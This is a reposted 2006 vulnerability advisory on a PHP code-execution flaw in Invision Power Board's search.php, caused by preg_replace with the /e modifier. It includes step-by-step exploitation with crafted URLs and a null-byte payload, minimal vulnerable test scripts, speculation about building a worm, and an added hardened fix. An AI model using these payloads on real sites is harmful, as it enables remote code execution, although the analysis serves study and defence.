ipb search.php vulnerability analysis and thinking-vulnerability warning-the black bar safety net

2007-02-13T00:00:00
ID MYHACK58:62200714214
Type myhack58
Reporter Anonymous
Modified 2007-02-13T00:00:00

Description

ipb search.php vulnerability analysis and thinking

###########################################

A single vulnerability model can unearth a whole batch of vulnerabilities; the idea is what matters most. Here the model is preg_replace + /e.

###########################################

Author: SuperHei_[At]_ph4nt0m.org Blog: http://superhei.blogbus.com/ Team: http://www.ph4nt0m.org Date: 2006-04-27

#######

### Simple analysis ###

#######

This vulnerability is another instance of the preg_replace + /e class. The code is in \sources\action_admin\search.php, lines 1258-1262:

    if ( $this->ipsclass->input['lastdate'] )
    {
        $this->output = preg_replace( "#(value=[\"']{$this->ipsclass->input['lastdate']}[\"'])#i", "\\1 selected='selected'", $this->output );
    }
    }

The user-controlled variable input['lastdate'] is interpolated straight into the pattern, so /e can be injected through it; the shellcode that was previously planted in $this->output is then executed.

#######

### Exploitation method ###

#######

Register a user and post a message containing the shellcode, as follows:

superheixxxxxxxeval(phpinf0()); //

Note that there is a space between the final ; and the //.

Then click "Search" ---> Search by Keywords: superheixxxxxxxeval [remember to choose "Show results as posts"].

You obtain a searchid URL of the form http://127.0.0.1/ipb215/upload/inde..._in=posts&result_type=posts&highlite=superheixxxxxxxeval

Then append &lastdate=z|eval.*?%20//)%23e%00, that is, the [/e] modifier, and submit:

http://127.0.0.1/ipb215/upload/inde..._in=posts&result_type=posts&highlite=superheixxxxxxxeval&lastdate=z|eval.*?%20//)%23e%00

#######

### Analysis and discussion ###

#######
1. Quoting the simple analysis above: the preg_replace call on input['lastdate'] in \sources\action_admin\search.php, where injecting /e through that variable executes the shellcode already placed in $this->output.

This analysis brings out an important detail. preg_replace with /e takes three parameters, and only the second parameter (the replacement) is executed as code, yet in the statement above the injected code appears to arrive through the third parameter ($this->output). In fact, look at the second parameter of that preg_replace: \\1 selected='selected'. The \\1 is the value captured by the first subpattern of the regular expression in the first parameter. So, in the final analysis, the shellcode we submit is still executed from the second parameter.

2. Quoting: note the space between the final ; and the //.

Why is that? Because the lastdate we submit, z|eval.*?%20//)%23e%00, uses space+// as the terminator, so the shellcode we post must also end with a space followed by //.

3. Does preg_replace have a null-byte truncation vulnerability?

I think this should be counted as a vulnerability in PHP itself (like the earlier include() null-byte truncation). To test the vulnerability above, write a simple model:

    <? $a=$_GET['a']; echo preg_replace("#(value=[\"']z|eval.*?//)#e{$a}[\"'])#i","\\1 ","heigegegxxxxxxxeval(phpinfo());//"); ?>

Submitting http://127.0.0.1/test2.php?a=2 directly gives the error: Warning: Unknown modifier '2' in d:\easyphp\www\test2.php on line 3

Submitting http://127.0.0.1/test2.php?a=%002 executes phpinfo(): the truncation succeeded. This model only executes code with magic_quotes_gpc (gpc) off, but many web applications encode and decode variables before using them and so are not affected by gpc; the IPB case above truncates even with gpc=on.

4. Construction of "lastdate=z|eval.*?%20//)%23e%00": the eval and %20// already present in $this->output serve as markers, so that \\1 captures exactly the PHP code to be executed.

5. Worm use? Remember Santy? Didn't it exploit a preg_replace in phpBB? Exploiting IPB this way requires being logged in, and IPB registration has an image CAPTCHA ("picture authentication"), but it is said that a program can be written to read it. As long as that is broken, a worm is possible; after all, IPB has so many users......

#######

### Summary of the model ###

#######
1. Direct execution through the second parameter of preg_replace (with $h taken from the request):

    <? $h=$_GET['h']; echo preg_replace("/test/e",$h,"jutst test"); ?>

Submit http://127.0.0.1/test/11/preg.php?h=phpinfo(). Example: the phpBB viewtopic.php $highlight_match PHP code execution vulnerability.

2. Extracting PHP code from the third parameter via \\1 (or \\n) and executing it:

    <? $h=$_GET['h']; echo preg_replace("/\s\php\\ [\/php\]\s/ies", "\\1", $h); ?>

Submit: http://127.0.0.1/test/11/preg.php?h=Codz: phpinfo()
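Both modes above share one root cause: user input reaches a preg_replace pattern, or a /e replacement, without escaping. As an added example (not IPB's code, nor the advisory author's), here is the shape of the search.php call beside a hardened form that allow-lists the value, escapes it with preg_quote(), and uses preg_replace_callback() instead of /e (the /e modifier was removed in PHP 7). The option list and the function names are constructed for this illustration.

```php
<?php
// Added example, not code from IPB or the advisory author.

// Shape of the vulnerable search.php call: $lastdate is interpolated into the
// pattern unescaped, so it can close the group, supply a new delimiter and
// append the /e modifier, which made PHP eval() the replacement (before PHP 7).
function markSelectedUnsafe(string $lastdate, string $html): string
{
    return preg_replace("#(value=[\"']{$lastdate}[\"'])#i",
                        "\\1 selected='selected'", $html);
}

// Hardened form.
// 1. Allow-list the value shape: rejects NUL bytes, '#', '|', ')' and anything
//    else that is not a plausible option value, so delimiter/modifier injection
//    and the NUL truncation discussed above never reach the regex engine.
// 2. preg_quote() with the '#' delimiter escapes every regex metacharacter.
// 3. preg_replace_callback() performs the rewrite with no /e evaluation at all.
function markSelectedSafe(string $lastdate, string $html): ?string
{
    if (!preg_match('/\A[0-9A-Za-z_.\-]{1,32}\z/', $lastdate)) {
        return null; // caller treats null as "invalid parameter"
    }
    $pattern = '#(value=["\']' . preg_quote($lastdate, '#') . '["\'])#i';
    return preg_replace_callback(
        $pattern,
        function (array $m): string {
            return $m[1] . " selected='selected'";
        },
        $html
    );
}

// Constructed sample option list standing in for $this->output.
$html = "<option value='z'>z</option>\n<option value='2006'>2006</option>";

// Normal value: the matching option gets selected='selected'.
echo markSelectedSafe('2006', $html), "\n";

// Value carrying a NUL byte and regex metacharacters: rejected before any regex runs.
var_dump(markSelectedSafe("z|x\x00", $html)); // NULL
```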

References: r57 exploit: http://www.milw0rm.com/exploits/1720 More information: http://www.google.com